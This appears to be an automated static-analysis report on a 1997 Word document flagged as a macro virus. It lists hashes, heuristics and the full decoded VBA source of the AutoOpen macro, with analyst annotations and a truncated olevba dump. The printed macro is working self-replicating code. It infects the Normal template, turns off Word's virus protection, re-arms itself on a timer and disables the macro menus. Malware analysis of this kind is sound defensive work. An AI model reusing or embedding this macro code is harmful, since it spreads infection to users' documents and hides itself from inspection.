Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 072540303a343923…

MALICIOUS

Office (OLE)

37.5 KB Created: 1997-09-17 11:18:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 1f5d8d3dbda0bd570a088112c3d3561f SHA-1: 47fe521d53ab2771a853ec88a8d80880a432198c SHA-256: 072540303a343923866fb14f0ad6c5e57f4a5cb3e0df05862d698935759d14bc
140 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample is a legacy Word document containing a WordBasic AutoOpen macro. The macro's primary function appears to be to copy itself to the Normal.dot template, potentially to establish persistence or spread to other documents. The presence of the AutoOpen marker and the macro code strongly indicates malicious intent.

Heuristics 4

  • ClamAV: Win.Trojan.W97M-13 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.W97M-13
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of a legacy Word macro execution surface; on its own it does not attribute the sample to a downloader or to a parser CVE.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11382 bytes
SHA-256: e478a532851e186b6f9cf890ecbcb8db468fdca801ee2cb75bd204259e8f5055
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Analyst note: module header of the ThisDocument stream as recovered by
' olevba (listed in the "Module streams" dump further down as
' Macros/VBA/ThisDocument, 903 bytes). No procedures from this module
' appear in the preview; all executable logic is in the AutoOpen module below.

Attribute VB_Name = "AutoOpen"
Option Explicit
' Analyst note: module named "AutoOpen" (Macros/VBA/AutoOpen stream, 5970
' bytes in the dump below). The report flags the name as an auto-execution
' marker (OLE_VBA_AUTOOPEN / OLE_LEGACY_WORDBASIC_AUTOEXEC); its entry
' procedure is Sub MAIN() below, consistent with the WordBasic-converted
' AutoOpen macro the report describes.

Public Sub MAIN()
' Analyst summary: entry point of the AutoOpen module. The procedure
'   1. builds the active document's full path,
'   2. at the top of an hour shows a message box (the only visible payload),
'   3. copies the "AutoOpen" project item between the active document and
'      the Normal template in whichever direction it is missing
'      (Application.OrganizerCopy), after clearing the template's file
'      attributes and turning Options.VirusProtection off,
'   4. re-arms itself via Application.OnTime and disables the Tools > Macro
'      menu entries and the "Visual Basic" command bar.
' Every run-time failure is masked by On Error Resume Next.
' Detection/mitigation notes: the Normal template modification, the
' VirusProtection toggle, OrganizerCopy of an "AutoOpen" item and the OnTime
' re-arming are the observable indicators. The disabled menus hinder
' inspection from inside Word, so the VBA project should be examined with an
' external tool (as olevba did here) rather than from the Word UI.

Dim MyFile$
Dim OkExist
Dim TemplateName$
Dim internal
Dim xItem
Dim t
Dim s

' GBK-encoded string shown as Latin-1 mojibake in this dump; decoded it
' appears to be a Chinese political slogan. It is only displayed (MsgBox
' below) and plays no part in the infection logic.
s = "¸ß¾ÙµËСƽÀíÂÛΰ´óÆìÖÄ£¬°Ñ½¨ÉèÓÐÖйúÌØÉ«Éç»áÖ÷ÒåÊÂÒµÈ«ÃæÍÆÏò¶þʮһÊÀ¼Í"

'ÉèÖôíÎóÏÝÚå  [GBK mojibake; original comment reads approx. "set error trap"]
' All errors below are swallowed, so partial failures (read-only template,
' inaccessible VBProject, ...) do not stop the procedure.
On Error Resume Next

'»ñÈ¡»î¶¯ÎļþÃû  [approx. "get the active document's file name"]
' An unsaved document has an empty Path; then only the name is used.
If ActiveDocument.Path = "" Then
  MyFile$ = ActiveDocument.Name
Else
  MyFile$ = ActiveDocument.Path + "\" + ActiveDocument.Name
End If

' No document name at all: skip the copy logic. The timer and menu
' disabling after the Bye: label still run, with t still unassigned.
If MyFile$ = "" Then GoTo Bye

'Õûµã³öÏÖÈÕÆÚʱ¼äÐÅÏ¢  [approx. "show date/time information on the hour"]
' t is "hhmmss"; Mid(t, 3, 2) is the minutes field, so the message box
' appears when the minutes are 00, except during Jan-Aug 1998 (date gate).
t = Format(Time, "hhmmss")
If Mid(t, 3, 2) = "00" And Not (Format(Date, "yyyy") = "1998" And Val(Format(Date, "mm")) < 9) Then
  MsgBox s, vbSystemModal, "CPSDI"
  'MsgBox Format(Date, "dddd,yyyy mmm dd") + "ÈÕ " + Format(Time, "hh") + "ʱ", vbSystemModal, "ÎÒµÄÌáÐÑ"
  ' (commented-out alternative message in the original; kept as found)
End If


' ÔÚͨÓÃÄ£°åÖвéÕÒÊÇ·ñÓÐAutoOpenºê  [approx. "check whether the Normal template already has an AutoOpen macro"]
' Type 1 is the standard-module component type; OkExist = 1 means the
' global template already carries an "AutoOpen" module.
OkExist = 0
For Each xItem In NormalTemplate.VBProject.VBComponents
  If xItem.Type = 1 And xItem.Name = "AutoOpen" Then
    OkExist = 1
    Exit For
  End If
Next xItem

' »ñȡͨÓÃÄ£°åµÄÎļþÃû  [approx. "get the Normal template's file name"]
TemplateName$ = NormalTemplate.Path + "\" + NormalTemplate.Name

'ÉèÖÃͨÓÃÄ£°åµÄÎļþÊôÐÔΪµµ°¸²¢½â³ýÆä²¡¶¾·À»¤¹¦ÄÜ  [approx. "set the template's file attributes to normal and remove its virus protection"]
' SetAttr ... vbNormal clears attributes such as read-only on the template
' file so it can be written; Options.VirusProtection = False turns off
' Word's macro-virus warning for documents opened afterwards. Both are
' strong macro-virus indicators.
SetAttr TemplateName$, vbNormal
Options.VirusProtection = False

' ¿½±´AutoOpenºêµ½Í¨ÓÃÄ£°å  [approx. "copy the AutoOpen macro to the Normal template"]
' Infection of the global template: the "AutoOpen" project item is copied
' from this document into the Normal template when the template lacks it.
If OkExist <> 1 Then
    Application.OrganizerCopy Source:=MyFile$, Destination:=TemplateName$, Name:="AutoOpen", Object:=wdOrganizerObjectProjectItems
End If

' ÔڻÎĵµÖвéÕÒÊÇ·ñÓÐAutoOpenºê  [approx. "check whether the active document has an AutoOpen macro"]
OkExist = 0
For Each xItem In ActiveDocument.VBProject.VBComponents
  If xItem.Type = 1 And xItem.Name = "AutoOpen" Then
    OkExist = 1
    Exit For
  End If
Next xItem

'¿½±´AutoOpenºêµ½»î¶¯Îĵµ  [approx. "copy the AutoOpen macro to the active document"]
' Reverse direction: once the template carries the module, a document
' opened without it receives the module from the template.
If OkExist <> 1 Then
    Application.OrganizerCopy Source:=TemplateName$, Destination:=MyFile$, Name:="AutoOpen", Object:=wdOrganizerObjectProjectItems
End If

Bye:

' ÉèÖÃ×Ô¶¯ÔËÐÐAutoOpenºêµÄ¼ÆÊ±Æ÷  [approx. "set a timer to run the AutoOpen macro automatically"]
' Mid(t, 4, 1) is the last digit of the minutes; 10 minus it is the number
' of minutes to the next multiple of ten. Str() prefixes a space for
' non-negative values (giving e.g. "00: 7"); whether TimeValue accepts that
' form is not shown here, and any error is masked. OnTime then schedules the
' macro named "AutoOpen" (presumably resolved to this module) at roughly
' that boundary with a 60 s tolerance, so it keeps re-running for the life
' of the Word session. If Bye: was reached via the GoTo above, t has never
' been assigned here.
internal = "00:" + Str(10 - Val(Mid(t, 4, 1)))
Application.OnTime When:=Now + TimeValue(internal) - TimeValue("00:00:" + Right(t, 2)), Name:="AutoOpen", Tolerance:=60
' Hide the macro tooling from the user (procedures defined below).
DisableMacroMenu
DisableVBTools
End Sub
Public Sub DisableMacroMenu()
'ʹ¹¤¾ß²Ëµ¥ÖеĺêÃüÁî×éʧȥ×÷ÓÃ  [GBK mojibake; approx. "make the macro command group in the Tools menu ineffective"]
' Analyst note: walks the document's CommandBars to the "Menu Bar", finds
' the control captioned "¹¤¾ß(&T)" (GBK for the Chinese Tools(&T) menu) and
' its sub-control "ºê(&M)" (Macro(&M)), then sets Enabled = False on every
' control beneath it and returns. The captions are literal strings, so this
' only matches a Chinese-localized Word UI; elsewhere the loops find nothing
' and the procedure is a no-op. It has no error handler of its own; when
' called from MAIN, errors fall under MAIN's On Error Resume Next.
Dim cb, xItem, xxItem, xxxItem
For Each cb In ActiveDocument.CommandBars
  If cb.Name = "Menu Bar" Then
    For Each xItem In cb.Controls
      If xItem.Caption = "¹¤¾ß(&T)" Then
        For Each xxItem In xItem.Controls
          If xxItem.Caption = "ºê(&M)" Then
            'xxItem.Enabled = True
            ' (disabled line in the original, kept as found)
            For Each xxxItem In xxItem.Controls
                xxxItem.Enabled = False
            Next xxxItem
            Exit Sub
          End If
        Next xxItem
      End If
    Next xItem
  End If
Next cb
End Sub
Public Sub DisableVBTools()
'ʹ¹¤¾ßÀ¸ÖеÄVisual Basicʧȥ×÷ÓÃ  [GBK mojibake; approx. "make the Visual Basic toolbar ineffective"]
' Analyst note: disables the command bar named "Visual Basic" on the active
' document's CommandBars collection and stops at the first match. Like
' DisableMacroMenu, it exists to keep the user away from the macro tooling;
' it has no error handler of its own and relies on MAIN's On Error Resume
' Next when called from there.
Dim cb
For Each cb In ActiveDocument.CommandBars
  If cb.Name = "Visual Basic" Then
     cb.Enabled = False
     Exit For
  End If
Next cb
End Sub


' Processing file: /opt/analyzer/scan_staging/1ff3b30365454cf8b005998ac955e428.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 903 bytes
' Macros/VBA/AutoOpen - 5970 bytes
' Line #0:
' 	Option  (Explicit)
' Line #1:
' Line #2:
' 	FuncDefn (Public Sub MAIN())
' Line #3:
' Line #4:
' 	Dim 
' 	VarDefn MyFile
' Line #5:
' 	Dim 
' 	VarDefn OkExist
' Line #6:
' 	Dim 
' 	VarDefn TemplateName
' Line #7:
' 	Dim 
' 	VarDefn internal
' Line #8:
' 	Dim 
' 	VarDefn xItem
' Line #9:
' 	Dim 
' 	VarDefn t
' Line #10:
' 	Dim 
' 	VarDefn s
' Line #11:
' Line #12:
' 	LitStr 0x0046 "¸ß¾ÙµËСƽÀíÂÛΰ´óÆìÖÄ£¬°Ñ½¨ÉèÓÐÖйúÌØÉ«Éç»áÖ÷ÒåÊÂÒµÈ«ÃæÍÆÏò¶þʮһÊÀ¼Í"
' 	St s 
' Line #13:
' Line #14:
' 	QuoteRem 0x0000 0x000C "ÉèÖôíÎóÏÝÚå"
' Line #15:
' 	OnError (Resume Next) 
' Line #16:
' Line #17:
' 	QuoteRem 0x0000 0x000E "»ñÈ¡»î¶¯ÎļþÃû"
' Line #18:
' 	Ld ActiveDocument 
' 	MemLd Path 
' 	LitStr 
... (truncated)